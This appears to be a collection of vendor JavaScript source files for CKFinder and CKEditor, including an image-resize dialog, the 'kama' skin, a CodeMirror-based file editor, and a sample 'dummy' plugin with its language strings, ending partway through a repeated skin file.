/* * Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.html or http://cksource.com/ckfinder/license * * The software, this file and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying or distribute this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. */ CKFinder.addPlugin( 'imageresize', { readOnly : false, connectorInitialized : function( api, xml ) { var node = xml.selectSingleNode( 'Connector/PluginsInfo/imageresize/@smallThumb' ); if ( node ) CKFinder.config.imageresize_thumbSmall = node.value; node = xml.selectSingleNode( 'Connector/PluginsInfo/imageresize/@mediumThumb' ); if ( node ) CKFinder.config.imageresize_thumbMedium = node.value; node = xml.selectSingleNode( 'Connector/PluginsInfo/imageresize/@largeThumb' ); if ( node ) CKFinder.config.imageresize_thumbLarge = node.value; }, uiReady : function( api ) { var regexExt = /^(.*)\.([^\.]+)$/, regexFileName = /^(.*?)(?:_\d+x\d+)?\.([^\.]+)$/, regexGetSize = /^\s*(\d+)(px)?\s*$/i, regexGetSizeOrEmpty = /(^\s*(\d+)(px)?\s*$)|^$/i, imageDimension = { width : 0, height : 0 }, file, doc; var updateFileName = function( dialog ) { var width = dialog.getValueOf( 'tab1', 'width' ) || 0, height = dialog.getValueOf( 'tab1', 'height' ) || 0, e = dialog.getContentElement( 'tab1', 'createNewBox' ); if ( width && height ) { var matches = file.name.match( regexFileName ); dialog.setValueOf( 'tab1', 'fileName', matches[1] + '_' + width + 'x' + height ); e.getElement().show(); } else e.getElement().hide(); }; var onSizeChange = function() { var value = this.getValue(), // This = input element. dialog = this.getDialog(), maxWidth = api.config.imagesMaxWidth, maxHeight = api.config.imagesMaxHeight, aMatch = value.match( regexGetSize ), width = imageDimension.width, height = imageDimension.height, newHeight, newWidth; if ( aMatch ) value = aMatch[1]; if ( !api.config.imageresize_allowEnlarging ) { if ( width && width < maxWidth ) maxWidth = width; if ( height && height < maxHeight ) maxHeight = height; } if ( maxHeight > 0 && this.id == 'height' && value > maxHeight ) { value = maxHeight; dialog.setValueOf( 'tab1', 'height', value ); } if ( maxWidth > 0 && this.id == 'width' && value > maxWidth ) { value = maxWidth; dialog.setValueOf( 'tab1', 'width', value ); } // Only if ratio is locked if ( dialog.lockRatio && width && height ) { if ( this.id == 'height' ) { if ( value && value != '0' ) value = Math.round( width * ( value / height ) ); if ( !isNaN( value ) ) { // newWidth > maxWidth if ( maxWidth > 0 && value > maxWidth ) { value = maxWidth; newHeight = Math.round( height * ( value / width ) ); dialog.setValueOf( 'tab1', 'height', newHeight ); } dialog.setValueOf( 'tab1', 'width', value ); } } else //this.id = txtWidth. { if ( value && value != '0' ) value = Math.round( height * ( value / width ) ); if ( !isNaN( value ) ) { // newHeight > maxHeight if ( maxHeight > 0 && value > maxHeight ) { value = maxHeight; newWidth = Math.round( width * ( value / height ) ); dialog.setValueOf( 'tab1', 'width', newWidth ); } dialog.setValueOf( 'tab1', 'height', value ); } } } updateFileName( dialog ); }; var resetSize = function( dialog ) { if ( imageDimension.width && imageDimension.height ) { dialog.setValueOf( 'tab1', 'width', imageDimension.width ); dialog.setValueOf( 'tab1', 'height', imageDimension.height ); updateFileName( dialog ); } }; var switchLockRatio = function( dialog, value ) { var doc = dialog.getElement().getDocument(), ratioButton = doc.getById( 'btnLockSizes' ); if ( imageDimension.width && imageDimension.height ) { if ( value == 'check' ) // Check image ratio and original image ratio. { var width = dialog.getValueOf( 'tab1', 'width' ), height = dialog.getValueOf( 'tab1', 'height' ), originalRatio = imageDimension.width * 1000 / imageDimension.height, thisRatio = width * 1000 / height; dialog.lockRatio = false; // Default: unlock ratio if ( !width && !height ) dialog.lockRatio = true; // If someone didn't start typing, lock ratio. else if ( !isNaN( originalRatio ) && !isNaN( thisRatio ) ) { if ( Math.round( originalRatio ) == Math.round( thisRatio ) ) dialog.lockRatio = true; } } else if ( value != undefined ) dialog.lockRatio = value; else dialog.lockRatio = !dialog.lockRatio; } else if ( value != 'check' ) // I can't lock ratio if ratio is unknown. dialog.lockRatio = false; if ( dialog.lockRatio ) ratioButton.removeClass( 'ckf_btn_unlocked' ); else ratioButton.addClass( 'ckf_btn_unlocked' ); return dialog.lockRatio; }; CKFinder.dialog.add( 'resizeDialog', function( api ) { return { title : api.lang.Imageresize.dialogTitle.replace( '%s', api.getSelectedFile().name ), // TODO resizable : CKFinder.DIALOG_RESIZE_BOTH minWidth : CKFinder.env.webkit ? 290 : 390, minHeight : 230, onShow : function() { var dialog = this, thumbSmall = CKFinder.config.imageresize_thumbSmall, thumbMedium = CKFinder.config.imageresize_thumbMedium, thumbLarge = CKFinder.config.imageresize_thumbLarge; doc = dialog.getElement().getDocument(); file = api.getSelectedFile(); this.setTitle( api.lang.Imageresize.dialogTitle.replace( '%s', file.name ) ); var previewImg = doc.getById( 'previewImage' ); var sizeSpan = doc.getById( 'imageSize' ); // Thumbnails should be limited to a reasonable value (#1020). previewImg.setAttribute( 'src', file.getThumbnailUrl( true ) ); previewImg.on( 'load', function() { previewImg.removeStyle( 'width' ); previewImg.removeStyle( 'height' ); var width = previewImg.$.width, height = previewImg.$.height; previewImg.hide(); if ( CKFinder.env.ie6Compat ) { if ( width > height ) previewImg.setStyles( { width : 100 + 'px', height : Math.round( height / ( width / 100 ) ) + 'px' } ); else previewImg.setStyles( { height : 100 + 'px', width : Math.round( width / ( height / 100 ) ) + 'px' } ); } else { previewImg.removeStyle( 'max-width' ); previewImg.removeStyle( 'max-height' ); if ( width > height ) previewImg.setStyle( 'max-width', '100px' ); else previewImg.setStyle( 'max-height', '100px' ); } previewImg.show(); }); var updateImgDimension = function( width, height ) { if ( !width || !height ) { sizeSpan.setText( '' ); return; } imageDimension.width = width; imageDimension.height = height; sizeSpan.setText( width + ' x ' + height + ' px' ); CKFinder.tools.setTimeout( function(){ switchLockRatio( dialog, 'check' ); }, 0, dialog ); }; api.connector.sendCommand( 'ImageResizeInfo', { fileName : file.name }, function( xml ) { if ( xml.checkError() ) return; var width = xml.selectSingleNode( 'Connector/ImageInfo/@width' ), height = xml.selectSingleNode( 'Connector/ImageInfo/@height' ), result; if ( width && height ) { width = parseInt( width.value, 10 ); height = parseInt( height.value, 10 ); updateImgDimension( width, height ); var checkThumbs = function( id, size ) { if ( !size ) return; var reThumb = /^(\d+)x(\d+)$/; result = reThumb.exec( size ); var el = dialog.getContentElement( 'tab1', id ); if ( 0 + result[ 1 ] > width && 0 + result[ 2 ] > height ) { el.disable(); el.getElement().setAttribute( 'title', api.lang.Imageresize.imageSmall ).addClass( 'cke_disabled' ); } else { el.enable(); el.getElement().setAttribute( 'title', '' ).removeClass( 'cke_disabled' ); } }; checkThumbs( 'smallThumb', thumbSmall ); checkThumbs( 'mediumThumb', thumbMedium ); checkThumbs( 'largeThumb', thumbLarge ); } }, file.folder.type, file.folder ); if ( !thumbSmall ) dialog.getContentElement( 'tab1', 'smallThumb' ).getElement().hide(); if ( !thumbMedium ) dialog.getContentElement( 'tab1', 'mediumThumb' ).getElement().hide(); if ( !thumbLarge ) dialog.getContentElement( 'tab1', 'largeThumb' ).getElement().hide(); if ( !thumbSmall && !thumbMedium && !thumbLarge ) dialog.getContentElement( 'tab1', 'thumbsLabel' ).getElement().hide(); dialog.setValueOf( 'tab1', 'fileName', file.name ); dialog.getContentElement( 'tab1', 'fileNameExt' ).getElement().setHtml( '.' + file.ext ); dialog.getContentElement( 'tab1', 'width' ).focus(); dialog.getContentElement( 'tab1', 'fileName').setValue( '' ); dialog.getContentElement( 'tab1', 'createNewBox' ).getElement().hide(); updateImgDimension( 0,0 ); }, onOk : function() { var dialog = this, width = dialog.getValueOf( 'tab1', 'width' ), height = dialog.getValueOf( 'tab1', 'height' ), small = dialog.getValueOf( 'tab1', 'smallThumb' ), medium = dialog.getValueOf( 'tab1', 'mediumThumb' ), large = dialog.getValueOf( 'tab1', 'largeThumb' ), fileName = dialog.getValueOf( 'tab1', 'fileName' ), createNew = dialog.getValueOf( 'tab1', 'createNew' ); if ( width && !height ) { api.openMsgDialog( '', api.lang.Imageresize.invalidHeight ); return false; } else if ( !width && height ) { api.openMsgDialog( '', api.lang.Imageresize.invalidWidth ); return false; } if ( !api.config.imageresize_allowEnlarging && ( parseInt( width, 10 ) > imageDimension.width || parseInt( height, 10 ) > imageDimension.height ) ) { var str = api.lang.Imageresize.sizeTooBig; api.openMsgDialog( '', str.replace( '%size', imageDimension.width + 'x' + imageDimension.height ) ); return false; } if ( ( width && height ) || small || medium || large ) { if ( !createNew ) fileName = file.name; api.connector.sendCommandPost( 'ImageResize', null, { width : width, height : height, fileName : file.name, newFileName : fileName + '.' + file.ext, overwrite : createNew ? 0 : 1, small : small ? 1 : 0, medium : medium ? 1 : 0, large : large ? 1 : 0 }, function( xml ) { if ( xml.checkError() ) return; api.openMsgDialog( '', api.lang.Imageresize.resizeSuccess ); api.refreshOpenedFolder(); }, file.folder.type, file.folder ); } return undefined; }, contents : [ { id : 'tab1', label : '', title : '', expand : true, padding : 0, elements : [ { type : 'hbox', // The dialog window looks weird on Webkit (#1021) widths : [ ( CKFinder.env.webkit ? 130 : 180 ) + 'px', ( CKFinder.env.webkit ? 250 : 280 ) + 'px' ], children: [ { type : 'vbox', children: [ { type : 'html', html : '' + '<style type="text/css">' + 'a.ckf_btn_reset' + '{' + 'float: right;' + 'background-position: 0 -32px;' + 'background-image: url("' + CKFinder.getPluginPath( 'imageresize' ) + 'images/mini.gif");' + 'width: 16px;' + 'height: 16px;' + 'background-repeat: no-repeat;' + 'border: 1px none;' + 'font-size: 1px;' + '}' + 'a.ckf_btn_locked,' + 'a.ckf_btn_unlocked' + '{' + 'float: left;' + 'background-position: 0 0;' + 'background-image: url("' + CKFinder.getPluginPath( 'imageresize' ) + 'images/mini.gif");' + 'width: 16px;' + 'height: 16px;' + 'background-repeat: no-repeat;' + 'border: none 1px;' + 'font-size: 1px;' + '}' + 'a.ckf_btn_unlocked' + '{' + 'background-position: 0 -16px;' + 'background-image: url("' + CKFinder.getPluginPath( 'imageresize' ) + '/images/mini.gif");' + '}' + '.ckf_btn_over' + '{' + 'border: outset 1px;' + 'cursor: pointer;' + 'cursor: hand;' + '}' + '</style>' + '<div style="height:110px;padding:7px">' + '<img id="previewImage" src="" style="margin-bottom:4px; max-width: 100px; max-height: 100px;" /><br />' + '<span style="font-size:9px;" id="imageSize"></span>' + '</div>' }, { type : 'html', id : 'thumbsLabel', html : '<strong>' + api.lang.Imageresize.thumbnailNew + '</strong>' }, { type : 'checkbox', id : 'smallThumb', checked : false, label : api.lang.Imageresize.thumbnailSmall.replace( '%s', CKFinder.config.imageresize_thumbSmall ) }, { type : 'checkbox', id : 'mediumThumb', checked : false, label : api.lang.Imageresize.thumbnailMedium.replace( '%s', CKFinder.config.imageresize_thumbMedium ) }, { type : 'checkbox', id : 'largeThumb', checked : false, label : api.lang.Imageresize.thumbnailLarge.replace( '%s', CKFinder.config.imageresize_thumbLarge ) } ] }, { type : 'vbox', children : [ { type : 'html', html : '<strong>' + api.lang.Imageresize.newSize + '</strong>' }, { type : 'hbox', widths : [ '80%', '20%' ], children: [ { type : 'vbox', children: [ { type : 'text', labelLayout : 'horizontal', label : api.lang.Imageresize.width, onKeyUp : onSizeChange, validate: function() { var value = this.getValue(); if ( value ) { var aMatch = value.match( regexGetSize ); if ( !aMatch || parseInt( aMatch[1], 10 ) < 1 ) { api.openMsgDialog( '', api.lang.Imageresize.invalidWidth ); return false; } } return true; }, id : 'width' }, { type : 'text', labelLayout : 'horizontal', label : api.lang.Imageresize.height, onKeyUp : onSizeChange, validate: function() { var value = this.getValue(); if ( value ) { var aMatch = value.match( regexGetSize ); if ( !aMatch || parseInt( aMatch[1], 10 ) < 1 ) { api.openMsgDialog( '', api.lang.Imageresize.invalidHeight ); return false; } } return true; }, id : 'height' } ] }, { type : 'html', onLoad : function() { var doc = this.getElement().getDocument(), dialog = this.getDialog(); // Activate Reset button var resetButton = doc.getById( 'btnResetSize' ), ratioButton = doc.getById( 'btnLockSizes' ); if ( resetButton ) { resetButton.on( 'click', function( evt ) { resetSize( this ); evt.data.preventDefault(); }, dialog ); resetButton.on( 'mouseover', function() { this.addClass( 'ckf_btn_over' ); }, resetButton ); resetButton.on( 'mouseout', function() { this.removeClass( 'ckf_btn_over' ); }, resetButton ); } // Activate (Un)LockRatio button if ( ratioButton ) { ratioButton.on( 'click', function( evt ) { var locked = switchLockRatio( this ), width = this.getValueOf( 'tab1', 'width' ); if ( imageDimension.width && width ) { var height = imageDimension.height / imageDimension.width * width; if ( !isNaN( height ) ) { this.setValueOf( 'tab1', 'height', Math.round( height ) ); updateFileName( dialog ); } } evt.data.preventDefault(); }, dialog ); ratioButton.on( 'mouseover', function() { this.addClass( 'ckf_btn_over' ); }, ratioButton ); ratioButton.on( 'mouseout', function() { this.removeClass( 'ckf_btn_over' ); }, ratioButton ); } }, html : '<div style="margin-top:4px">'+ '<a href="javascript:void(0)" tabindex="-1" title="' + api.lang.Imageresize.lockRatio + '" class="ckf_btn_locked ckf_btn_unlocked" id="btnLockSizes"></a>' + '<a href="javascript:void(0)" tabindex="-1" title="' + api.lang.Imageresize.resetSize + '" class="ckf_btn_reset" id="btnResetSize"></a>'+ '</div>' } ] }, { type : 'vbox', id : 'createNewBox', hidden : true, children: [ { type : 'checkbox', checked : true, id : 'createNew', label : api.lang.Imageresize.newImage, 'default' : true, onChange : function() { var dialog = this.getDialog(); var filenameInput = dialog.getContentElement( 'tab1', 'fileName' ); if ( filenameInput ) { if ( !this.getValue() ) filenameInput.getElement().hide(); else filenameInput.getElement().show(); } } }, { type : 'hbox', widths : [ '90%', '10%' ], padding : 0, children : [ { type : 'text', label : '', validate : function() { var dialog = this.getDialog(), createNew = dialog.getContentElement( 'tab1', 'createNew' ), value = this.getValue(); if ( createNew && dialog.getValueOf( 'tab1', 'width' ) && dialog.getValueOf( 'tab1', 'height' ) ) { if ( !value ) { api.openMsgDialog( '', api.lang.Imageresize.invalidName ); return false; } } return true; }, id : 'fileName' }, { type : 'html', html : '', id : 'fileNameExt', onLoad : function() { this.getElement().getParent().setStyles( { 'vertical-align' : 'bottom', 'padding-bottom' : '2px' } ); } } ] } ] } ] } ] } ] } ], // TODO http://dev.fckeditor.net/ticket/4750 buttons : [ CKFinder.dialog.okButton, CKFinder.dialog.cancelButton ] }; } ); api.addFileContextMenuOption( { label : api.lang.Imageresize.contextMenuName, command : 'resizeImage' } , function( api, file ) { api.openDialog( 'resizeDialog' ); }, function ( file ) { // Disable for files other than images. if ( !file.isImage() || !api.getSelectedFolder().type ) return false; if ( file.folder.acl.fileDelete && file.folder.acl.fileUpload ) return true; else return -1; } ); } } );
JavaScript
/* Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKEDITOR.skins.add( 'kama', (function() { var uiColorStylesheetId = 'cke_ui_color'; return { editor : { css : [ 'editor.css' ] }, dialog : { css : [ 'dialog.css' ] }, richcombo : { canGroup: false }, templates : { css : [ 'templates.css' ] }, margins : [ 0, 0, 0, 0 ], init : function( editor ) { if ( editor.config.width && !isNaN( editor.config.width ) ) editor.config.width -= 12; var uiColorMenus = []; var uiColorRegex = /\$color/g; var uiColorMenuCss = "/* UI Color Support */\ .cke_skin_kama .cke_menuitem .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a:hover .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem a:focus .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem a:active .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a:hover .cke_label,\ .cke_skin_kama .cke_menuitem a:focus .cke_label,\ .cke_skin_kama .cke_menuitem a:active .cke_label\ {\ background-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a.cke_disabled:hover .cke_label,\ .cke_skin_kama .cke_menuitem a.cke_disabled:focus .cke_label,\ .cke_skin_kama .cke_menuitem a.cke_disabled:active .cke_label\ {\ background-color: transparent !important;\ }\ \ .cke_skin_kama .cke_menuitem a.cke_disabled:hover .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem a.cke_disabled:focus .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem a.cke_disabled:active .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a.cke_disabled .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuseparator\ {\ background-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a:hover,\ .cke_skin_kama .cke_menuitem a:focus,\ .cke_skin_kama .cke_menuitem a:active\ {\ background-color: $color !important;\ }"; // We have to split CSS declarations for webkit. if ( CKEDITOR.env.webkit ) { uiColorMenuCss = uiColorMenuCss.split( '}' ).slice( 0, -1 ); for ( var i = 0 ; i < uiColorMenuCss.length ; i++ ) uiColorMenuCss[ i ] = uiColorMenuCss[ i ].split( '{' ); } function getStylesheet( document ) { var node = document.getById( uiColorStylesheetId ); if ( !node ) { node = document.getHead().append( 'style' ); node.setAttribute( "id", uiColorStylesheetId ); node.setAttribute( "type", "text/css" ); } return node; } function updateStylesheets( styleNodes, styleContent, replace ) { var r, i, content; for ( var id = 0 ; id < styleNodes.length ; id++ ) { if ( CKEDITOR.env.webkit ) { for ( i = 0 ; i < styleContent.length ; i++ ) { content = styleContent[ i ][ 1 ]; for ( r = 0 ; r < replace.length ; r++ ) content = content.replace( replace[ r ][ 0 ], replace[ r ][ 1 ] ); styleNodes[ id ].$.sheet.addRule( styleContent[ i ][ 0 ], content ); } } else { content = styleContent; for ( r = 0 ; r < replace.length ; r++ ) content = content.replace( replace[ r ][ 0 ], replace[ r ][ 1 ] ); if ( CKEDITOR.env.ie ) styleNodes[ id ].$.styleSheet.cssText += content; else styleNodes[ id ].$.innerHTML += content; } } } var uiColorRegexp = /\$color/g; CKEDITOR.tools.extend( editor, { uiColor: null, getUiColor : function() { return this.uiColor; }, setUiColor : function( color ) { var cssContent, uiStyle = getStylesheet( CKEDITOR.document ), cssId = '.' + editor.id; var cssSelectors = [ cssId + " .cke_wrapper", cssId + "_dialog .cke_dialog_contents", cssId + "_dialog a.cke_dialog_tab", cssId + "_dialog .cke_dialog_footer" ].join( ',' ); var cssProperties = "background-color: $color !important;"; if ( CKEDITOR.env.webkit ) cssContent = [ [ cssSelectors, cssProperties ] ]; else cssContent = cssSelectors + '{' + cssProperties + '}'; return ( this.setUiColor = function( color ) { var replace = [ [ uiColorRegexp, color ] ]; editor.uiColor = color; // Update general style. updateStylesheets( [ uiStyle ], cssContent, replace ); // Update menu styles. updateStylesheets( uiColorMenus, uiColorMenuCss, replace ); })( color ); } }); editor.on( 'menuShow', function( event ) { var panel = event.data[ 0 ]; var iframe = panel.element.getElementsByTag( 'iframe' ).getItem( 0 ).getFrameDocument(); // Add stylesheet if missing. if ( !iframe.getById( 'cke_ui_color' ) ) { var node = getStylesheet( iframe ); uiColorMenus.push( node ); var color = editor.getUiColor(); // Set uiColor for new menu. if ( color ) updateStylesheets( [ node ], uiColorMenuCss, [ [ uiColorRegexp, color ] ] ); } }); // Apply UI color if specified in config. if ( editor.config.uiColor ) editor.setUiColor( editor.config.uiColor ); } }; })() ); (function() { CKEDITOR.dialog ? dialogSetup() : CKEDITOR.on( 'dialogPluginReady', dialogSetup ); function dialogSetup() { CKEDITOR.dialog.on( 'resize', function( evt ) { var data = evt.data, width = data.width, height = data.height, dialog = data.dialog, contents = dialog.parts.contents; if ( data.skin != 'kama' ) return; contents.setStyles( { width : width + 'px', height : height + 'px' }); }); } })(); /** * The base user interface color to be used by the editor. Not all skins are * compatible with this setting. * @name CKEDITOR.config.uiColor * @type String * @default '' (empty) * @example * // Using a color code. * config.uiColor = '#AADC6E'; * @example * // Using an HTML color name. * config.uiColor = 'Gold'; */
JavaScript
/* * Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.html or http://cksource.com/ckfinder/license * * The software, this file and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying or distribute this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. */ CKFinder.addPlugin( 'fileeditor', function( api ) { var regexExt = /^(.*)\.([^\.]+)$/, regexTextExt = /^(txt|css|html|htm|js|asp|cfm|cfc|ascx|php|inc|xml|xslt|xsl|cs)$/i, regexCodeMirrorExt = /^(css|html|htm|js|xml|xsl|php|cs)$/i, codemirror, file, fileLoaded = false, doc; var codemirrorPath = CKFinder.getPluginPath( 'fileeditor' ) + 'codemirror/'; var codeMirrorParsers = { css : codemirrorPath + 'mode/css/css.js', js : codemirrorPath + 'mode/javascript/javascript.js', html : [ codemirrorPath + 'mode/xml/xml.js', codemirrorPath + 'mode/javascript/javascript.js', codemirrorPath + 'mode/css/css.js', codemirrorPath + 'mode/htmlmixed/htmlmixed.js' ], xml : codemirrorPath + 'mode/xml/xml.js', php : [ codemirrorPath + 'mode/xml/xml.js', codemirrorPath + 'mode/javascript/javascript.js', codemirrorPath + 'mode/css/css.js', codemirrorPath + 'mode/clike/clike.js', codemirrorPath + 'mode/php/php.js' ], c : codemirrorPath + 'mode/clike/clike.js' }; codeMirrorParsers.htm = codeMirrorParsers.html; codeMirrorParsers.xsl = codeMirrorParsers.xml; codeMirrorParsers.cs = codeMirrorParsers.c; codeMirrorParsers.cpp = codeMirrorParsers.c; var codeMirrorModes = { js : 'javascript', htm : 'htmlmixed', html : 'htmlmixed', xsl : 'xml', c : 'clike', cs : 'clike', cpp : 'clike' }; CKFinder.dialog.add( 'fileEditor', function( api ) { var height, width; var saveButton = (function() { return { id : 'save', label : api.lang.Fileeditor.save, type : 'button', onClick : function ( evt ) { if ( !fileLoaded ) return true; var dialog = evt.data.dialog; var content = codemirror ? codemirror.getValue() : doc.getById( 'fileContent' ).getValue(); api.connector.sendCommandPost( 'SaveFile', null, { content : content, fileName : file.name }, function( xml ) { if ( xml.checkError() ) return false; api.openMsgDialog( '', api.lang.Fileeditor.fileSaveSuccess ); dialog.hide(); return undefined; }, file.folder.type, file.folder ); return false; } }; })(); if ( api.inPopup ) { width = api.document.documentElement.offsetWidth; height = api.document.documentElement.offsetHeight; } else { var parentWindow = ( api.document.parentWindow || api.document.defaultView ).parent; width = parentWindow.innerWidth ? parentWindow.innerWidth : parentWindow.document.documentElement.clientWidth; height = parentWindow.innerHeight ? parentWindow.innerHeight : parentWindow.document.documentElement.clientHeight; } var cssWidth = parseInt( width, 10 ) * 0.6 - 10, cssHeight = parseInt( height, 10 ) * 0.7 - 20; return { title : api.getSelectedFile().name, minWidth : parseInt( width, 10 ) * 0.6, minHeight : parseInt( height, 10 ) * 0.7, onHide : function() { if ( fileLoaded ) { var fileContent = doc.getById( 'fileContent' ); if ( fileContent ) fileContent.remove(); } }, onShow : function() { var dialog = this; doc = dialog.getElement().getDocument(); var win = doc.getWindow(); doc.getById( 'fileArea' ).setHtml( '<div class="ckfinder_loader_32" style="margin: 100px auto 0 auto;text-align:center;"><p style="height:' + cssHeight + 'px;width:' + cssWidth + 'px;">' + api.lang.Fileeditor.loadingFile + '</p></div>' ); file = api.getSelectedFile(); var enableCodeMirror = regexCodeMirrorExt.test( file.ext ); this.setTitle( file.name ); if ( enableCodeMirror && win.$.CodeMirror === undefined ) doc.appendStyleSheet( codemirrorPath + 'lib/codemirror.css' ); // If CKFinder is runninng under a different domain than baseUrl, then the following call will fail: // CKFinder.ajax.load( file.getUrl() + '?t=' + (new Date().getTime()), function( data )... var url = api.connector.composeUrl( 'DownloadFile', { FileName : file.name, format : 'text', t : new Date().getTime() }, file.folder.type, file.folder ); CKFinder.ajax.load( url, function( data ) { if ( data === null || ( file.size > 0 && data === '' ) ) { api.openMsgDialog( '', api.lang.Fileeditor.fileOpenError ); dialog.hide(); return; } else fileLoaded = true; var fileArea = doc.getById( 'fileArea' ); fileArea.setStyle( 'height', '100%' ); fileArea.setHtml( '<textarea id="fileContent" style="height:' + cssHeight + 'px; width:' + cssWidth + 'px"></textarea>' ); if ( CKFinder.env.opera ) doc.getById( 'fileContent' ).setHtml( CKFinder.tools.htmlEncode( data ) ); else doc.getById( 'fileContent' ).setText( data ); codemirror = null; if ( enableCodeMirror ) { CKFinder.scriptLoader.load( codemirrorPath + 'lib/codemirror.js', function() { CKFinder.scriptLoader.load( codeMirrorParsers[ file.ext ], function() { codemirror = win.$.CodeMirror.fromTextArea( doc.getById( 'fileContent' ).$, { mode : codeMirrorModes[ file.ext ] || file.ext } ); // TODO get rid of ugly buttons and provide something better var undoB = doc.createElement( 'button', { attributes: { 'label' : api.lang.common.undo } } ); undoB.on( 'click', function() { codemirror.undo(); }); undoB.setHtml( api.lang.common.undo ); undoB.appendTo( doc.getById( 'fileArea' ) ); var redoB = doc.createElement( 'button', { attributes: { 'label' : api.lang.common.redo } } ); redoB.on( 'click', function() { codemirror.redo(); }); redoB.setHtml( api.lang.common.redo ); redoB.appendTo( doc.getById( 'fileArea' ) ); }, this, false, doc.getHead() ); }, this, false, doc.getHead() ); } }); }, contents : [ { id : 'tab1', label : '', title : '', expand : true, padding : 0, elements : [ { type : 'html', id : 'htmlLoader', html : '' + '<style type="text/css">' + '#fileArea .CodeMirror {background:white}' + '#fileArea .CodeMirror-scroll {height:'+cssHeight+'px; width:'+cssWidth+'px}' + '#fileArea .CodeMirror .cm-tab {white-space:pre;}' + // FF >= 12 has some scrolling issue ( CKFinder.env.gecko && CKFinder.env.version >= 120000 ? '#fileArea .CodeMirror-scroll > div > div {position:absolute !important}' : '' ) + '</style>' + '<div id="fileArea"></div>' } ] } ], // TODO http://dev.fckeditor.net/ticket/4750 buttons : [ saveButton, CKFinder.dialog.cancelButton ] }; } ); api.addFileContextMenuOption( { label : api.lang.Fileeditor.contextMenuName, command : 'fileEditor' } , function( api, file ) { api.openDialog( 'fileEditor' ); }, function ( file ) { var maxSize = 1024; if ( typeof ( CKFinder.config.fileeditorMaxSize ) != 'undefined' ) maxSize = CKFinder.config.fileeditorMaxSize; // Disable for images, binary files, large files etc. if ( regexTextExt.test( file.ext ) && file.size <= maxSize ) return file.folder.acl.fileDelete ? true : -1; return false; }); } );
JavaScript
/** * Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.html or http://ckeditor.com/license * * CKFinder 2.x - sample "dummy" plugin. * * To enable it, add the following line to config.js: * config.extraPlugins = 'dummy'; */ /** * See http://docs.cksource.com/ckfinder_2.x_api/symbols/CKFinder.html#.addPlugin */ CKFinder.addPlugin( 'dummy', { lang : [ 'en', 'pl' ], appReady : function( api ) { CKFinder.dialog.add( 'dummydialog', function( api ) { // CKFinder.dialog.definition var dialogDefinition = { title : api.lang.dummy.title, minWidth : 390, minHeight : 230, onOk : function() { // "this" is now a CKFinder.dialog object. var value = this.getValueOf( 'tab1', 'textareaId' ); if ( !value ) { api.openMsgDialog( '', api.lang.dummy.typeText ); return false; } else { alert( "You have entered: " + value ); return true; } }, contents : [ { id : 'tab1', label : '', title : '', expand : true, padding : 0, elements : [ { type : 'html', html : '<h3>' + api.lang.dummy.typeText + '</h3>' }, { type : 'textarea', id : 'textareaId', rows : 10, cols : 40 } ] } ], buttons : [ CKFinder.dialog.cancelButton, CKFinder.dialog.okButton ] }; return dialogDefinition; } ); api.addFileContextMenuOption( { label : api.lang.dummy.menuItem, command : "dummycommand" } , function( api, file ) { api.openDialog('dummydialog'); }); } });
JavaScript
/* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKFinder.setPluginLang( 'dummy', 'pl', { dummy : { title : 'Testowe okienko', menuItem : 'Otwórz okienko dummy', typeText : 'Podaj jakiś tekst.' } });
JavaScript
/* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKFinder.setPluginLang( 'dummy', 'en', { dummy : { title : 'Dummy dialog', menuItem : 'Open dummy dialog', typeText : 'Please type some text.' } });
JavaScript
/* Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKEDITOR.skins.add( 'kama', (function() { var uiColorStylesheetId = 'cke_ui_color'; return { editor : { css : [ 'editor.css' ] }, dialog : { css : [ 'dialog.css' ] }, richcombo : { canGroup: false }, templates : { css : [ 'templates.css' ] }, margins : [ 0, 0, 0, 0 ], init : function( editor ) { if ( editor.config.width && !isNaN( editor.config.width ) ) editor.config.width -= 12; var uiColorMenus = []; var uiColorRegex = /\$color/g; var uiColorMenuCss = "/* UI Color Support */\ .cke_skin_kama .cke_menuitem .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a:hover .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem a:focus .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem a:active .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a:hover .cke_label,\ .cke_skin_kama .cke_menuitem a:focus .cke_label,\ .cke_skin_kama .cke_menuitem a:active .cke_label\ {\ background-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a.cke_disabled:hover .cke_label,\ .cke_skin_kama .cke_menuitem a.cke_disabled:focus .cke_label,\ .cke_skin_kama .cke_menuitem a.cke_disabled:active .cke_label\ {\ background-color: transparent !important;\ }\ \ .cke_skin_kama .cke_menuitem a.cke_disabled:hover .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem 